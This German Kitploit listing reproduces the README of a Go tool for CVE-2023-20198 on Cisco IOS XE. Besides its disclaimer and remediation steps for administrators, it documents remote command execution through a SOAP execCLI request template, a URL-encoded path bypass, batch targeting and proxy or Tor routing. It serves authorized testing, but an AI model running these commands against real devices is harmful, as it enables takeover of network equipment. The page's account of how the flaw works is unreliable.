Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cisco-cve-2023-20198-checker — Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung. | Kitploit
Tools/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
SchwachstellenscannerExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsCommand and Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Cisco CVE-2023-20198 Checker

Go Version License Platform

Ein professioneller Vulnerability-Scanner zur Erkennung von CVE-2023-20198 auf Cisco IOS XE-Geräten. Testet auf anfällige SOAP/XML-Schnittstellen (WSMA). Entwickelt für autorisierte Sicherheitsbewertungen und Netzwerkaudits.

⚠️ Rechtlicher Hinweis

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool ist ausschließlich bestimmt für:

  • Autorisierte Schwachstellenscans
  • Sicherheitsaudits mit ausdrücklicher schriftlicher Zustimmung
  • Netzwerksicherheitsbewertungen
  • Bildungszwecke in kontrollierten Laborumgebungen
  • Compliance- und Penetrationstests

Unbefugter Zugriff auf Computersysteme ist ILLEGAL. Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie Systeme testen.


🚀 Schnellstart

Installation

Mit go install (empfohlen)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Die Binärdatei wird in Ihr $GOPATH/bin-Verzeichnis installiert (normalerweise ~/go/bin).

Manuelle Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Bauen
go build -o cisco-cve-2023-20198-checker

# Installieren (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Einfache Nutzung

root@kitploit:~
# Einzelnes Ziel prüfen
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Mehrere Ziele prüfen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# HTML-Bericht generieren
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Funktionen

  • ✅ Schwachstellenerkennung – Testet auf CVE-2023-20198 (WSMA-RCE)
  • ✅ Einzel- und Batch-Zielscans
  • ✅ Unterstützung für benutzerdefinierte Ports (Standard: 443)
  • ✅ Befehlsausführung über SOAP/XML
  • ✅ Professionelle HTML-Berichterstellung
  • ✅ Keine externen Abhängigkeiten
  • ✅ Plattformübergreifend (Linux, macOS, Windows)
  • ✅ Option zum Überspringen der SSL/TLS-Zertifikatsprüfung
  • ✅ Konfigurierbare Timeouts
  • ✅ Proxy-Unterstützung (HTTP, HTTPS, SOCKS5)
  • ✅ Authentifizierte Proxys
  • ✅ Unterstützung von Umgebungsvariablen (HTTP_PROXY, HTTPS_PROXY)

🌐 Proxy-Unterstützung

Perfekt für Unternehmensumgebungen! Unterstützt:

  • HTTP/HTTPS-Proxys
  • SOCKS5-Proxys (SSH-Tunnel, Tor)
  • Authentifizierte Proxys
  • Umgebungsvariablen
root@kitploit:~
# HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Umgebungsvariable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Siehe PROXY_GUIDE.md für eine detaillierte Proxy-Konfiguration.


💻 Befehlszeilenoptionen


📖 Anwendungsbeispiele

Einzelnes Ziel testen

root@kitploit:~
# Grundlegende Schwachstellenprüfung
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Benutzerdefinierter Port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Bestimmten Befehl ausführen
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Bericht generieren
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Batch-Tests

root@kitploit:~
# Zieldatei erstellen
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Alle Ziele testen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch mit HTML-Bericht
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Erweiterte Befehle

root@kitploit:~
# Netzwerkerkundung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Versionserkennung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Über HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Über SOCKS5-Proxy (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Authentifizierter Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Über CVE-2023-20198

Schwachstellendetails

CVE-ID: CVE-2023-20198
CVSS-Score: 10.0 (Kritisch)
Typ: Remote Code Execution (RCE)
Betroffen: Cisco IOS XE Web UI (WSMA)

Technische Details

  • Endpunkt: /%2577ebui_wsma_https (Pfadcodierungs-Bypass)
  • Protokoll: SOAP 1.1 über HTTPS
  • Authentifizierung: WS-Security UsernameToken (gültige Anmeldedaten erforderlich)
  • Namespace: urn:cisco:wsma-exec
  • Auswirkung: Vollständige Kompromittierung des Geräts mit gültigen Anmeldedaten

SOAP-Request-Struktur

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Abhilfe

Für Systemadministratoren

Wenn Ihre Geräte angreifbar sind:

1. WSMA deaktivieren (falls nicht benötigt)

root@kitploit:~
no ip http server
no ip http secure-server

2. Zugriff mit ACLs einschränken

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Firmware aktualisieren – Aktuelle Cisco-Sicherheitspatches einspielen

4. Starke Authentifizierung aktivieren

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. Protokolle überwachen – Auf verdächtige SOAP/HTTP-Aktivitäten achten


🏗️ Aus dem Quellcode bauen

Voraussetzungen

  • Go 1.21 oder höher

Bauen

root@kitploit:~
# Standard-Build
go build -o cisco-cve-2023-20198-checker

# Optimiert (kleinere Binärdatei)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Für verschiedene Plattformen cross-kompilieren
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Ausgabebeispiele

Terminalausgabe

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML Security Checker                      ║
║     Nur für Bildungs- und autorisierte Sicherheitsaudits  ║
╚═══════════════════════════════════════════════════════════╝

[*] Befehl: show version
[*] Port: 443
[*] Timeout: 10 Sekunden

[1/1] Teste Ziel: 192.168.1.100:443
[*] Sende SOAP-Anfrage...
[+] Antwort empfangen (Status: 200)
[+] Erfolg!

╔═══════════════════════════════════════════════════════════╗
║                    BATCH-ERGEBNISSE                       ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - ERFOLG
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      ZUSAMMENFASSUNG                     ║
╚═══════════════════════════════════════════════════════════╝
Gesamte Ziele: 1
Erfolgreich: 1
Fehlgeschlagen: 0

HTML-Bericht

Professioneller Sicherheitsbewertungsbericht mit:

  • Statistik-Dashboard
  • Detaillierte Konfiguration
  • Befehlsausgaben (Terminal-Stil)
  • Technische Metadaten
  • Rechtliche Hinweise

🤝 Beitragen

Beiträge sind willkommen! Bitte:

  1. Repository forken
  2. Einen Feature-Branch erstellen
  3. Ihre Änderungen vornehmen
  4. Einen Pull-Request einreichen

📝 Lizenz

MIT-Lizenz – siehe LICENSE-Datei


🔗 Referenzen

  • Cisco-Sicherheitshinweis
  • CVE-2023-20198 Details
  • OWASP API-Sicherheit

⚖️ Verantwortungsvolle Offenlegung

Dieses Tool ist nur für autorisierte Schwachstellenscans bestimmt. Die Autoren sind nicht für Missbrauch verantwortlich. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.


Erstellt für die Sicherheits-Community 🛡️

Tool herunterladen
FlagTypStandardBeschreibung
-targetstring-Einzelnes Ziel-IP/Rechnername
-targets-filestring-Datei mit Zielen (eines pro Zeile)
-portint443HTTPS/SOAP-Port
-usernamestringadminSOAP-Benutzername
-passwordstring-Erforderlich. SOAP-Passwort
-commandstringuname -aAuszuführender Befehl
-htmlboolfalseHTML-Bericht generieren
-timeoutint10Request-Timeout (Sekunden)
-skip-verifybooltrueSSL-Überprüfung überspringen
-proxystring-Proxy-URL (http://, https://, socks5://)